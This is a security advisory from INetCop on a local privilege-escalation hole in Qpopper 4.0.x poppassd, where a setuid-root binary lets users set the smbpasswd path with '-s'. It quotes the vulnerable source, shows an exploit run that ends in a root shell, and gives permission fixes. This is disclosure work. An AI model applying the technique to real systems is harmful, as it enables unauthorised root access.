INetCop Security Advisory #2003-0x82-016 - Qpopper v4.0.x poppassd, the utility that allows users to change their mail passwords, is setuid root and allows for a definable path to smbpasswd. In doing so, a local attacker can easily escalate to root privileges.
INetCop Security Advisory #2003-0x82-016
* Title: Qpopper v4.0.x poppassd local root exploit
0x01. Description
Qpopper poppassd is a program that changes system passwords thus allowing users
to change their mail passwords.
We found security bug to poppassd that is included to basis to Qpopper v4.0.x.
Through this security bug, allow root user's authority to general user.
For reference, poppassd is daemon that is executed by root (uid 0).
/etc/services: epass 106/tcp poppassd
/etc/inetd.conf: epass stream tcp nowait root /usr/sbin/tcpd poppassd
Vulnerability can presume as following.
There is dochild() function to 711 lines of 'password/poppassd.c' code.
170 #define PASSWD_BINARY "/usr/bin/passwd" /* TBD: config.h */
171 #define SMBPASSWD_BINARY "/usr/bin/smbpasswd" /* TBD: config.h */
711 int dochild (int master, char *slavedev, char *userid, int smb)
712 {
781 if (!smb)
782 {
784 setregid ( pw->pw_gid, pw->pw_gid ); // It's natural.
785 setreuid ( pw->pw_uid, pw->pw_uid ); // It's natural. ;-)
787 execl ( pwd_binary, "passwd", NULL ); // ok, is executed by general user.
789 err_msg ( HERE, "can't exec %s", pwd_binary );
790 exit ( 1 );
791 }
792 else
793 {
794 TRACE ( trace_file, POP_DEBUG, HERE, "...changing smb password" );
795 execl ( smb_binary, "smbpasswd", userid, NULL ); // Ooops, is executed by root user.
797 err_msg ( HERE, "can't exec %s", smb_binary );
798 exit ( 1 );
799 }
800 }
Setuid of "/usr/bin/smbpasswd" is not established.
Certainly, "/usr/bin/smbpasswd" may be executed as root competence.
Root setuid of poppassd is established.
[x82@xpl017elz password]$ cat Makefile | grep install
# * - Added patch by Steven Champeon to fix install and lib.
installdir = ${exec_prefix}/bin
INSTALL = /usr/bin/install -c
${INSTALL} -m 4755 -o root -g 0 poppassd ${installdir}/poppassd; \
echo "Installed poppassd as ${installdir}/poppassd"
[x82@xpl017elz password]$ pwd
[x82@xpl017elz password]$ ls -al /usr/local/bin/poppassd
-rwsr-xr-x 1 root root 108300 Apr 17 00:55 /usr/local/bin/poppassd
[x82@xpl017elz password]$ poppassd -?
poppassd [-?] [-d] [-l 0|1|2] [-p [passd-path]] [-R] [-s [smbpasswd-path]]
[-t trace-file] [-v] [-y log-facility]
[x82@xpl017elz password]$
Fatal vulnerability !! It happens because general user can control smbpasswd's path.
'-s' option capacitates it.
0x02. Vulnerable Packages
It's poppassd version that is included to qpopper regardless of improved version.
[x82@xpl017elz /tmp]$ poppassd -v
poppassd version 4.0.5b2
[x82@xpl017elz /tmp]$
Vendor site:
qpopper4.0.5 (Inclusion)
qpopper4.0.4 (Inclusion)
qpopper4.0.3 (Inclusion)
beta version: qpopper4.0.*
0x03. Exploit
We finished exploit. (Tested it in Linux.)
[x82@xpl017elz /tmp]$ ./0x82-Local.Qp0ppa55d -u x82 -p mypasswd
Qpopper v4.0.x poppassd local root exploit.
by Xpl017Elz
[+] make code.
[+] execute poppassd.
200 xpl017elz poppassd v4.0.5b2 hello, who are you?
[+] input username.
200 your password please.
[+] input password.
200 your new password please.
[+] input fake new password.
[+] wait, 2sec.
[+] Ok, exploited successfully.
[*] It's Rootshell !
[root@xpl017elz /root]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@xpl017elz /root]#
0x04. Patch
It is vendor's share that trim vulnerability.
Can reduce danger that remove setuid simply, or designate wheel group.
# chmod -s poppassd
# chgrp wheel poppassd
# chmod o-rx poppassd
# chmod u+s poppassd
And, very excellent poppassd package version exists.
poppassd in Qpopper package does not use for the present. :-p
P.S: Sorry, for my poor english.
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com,
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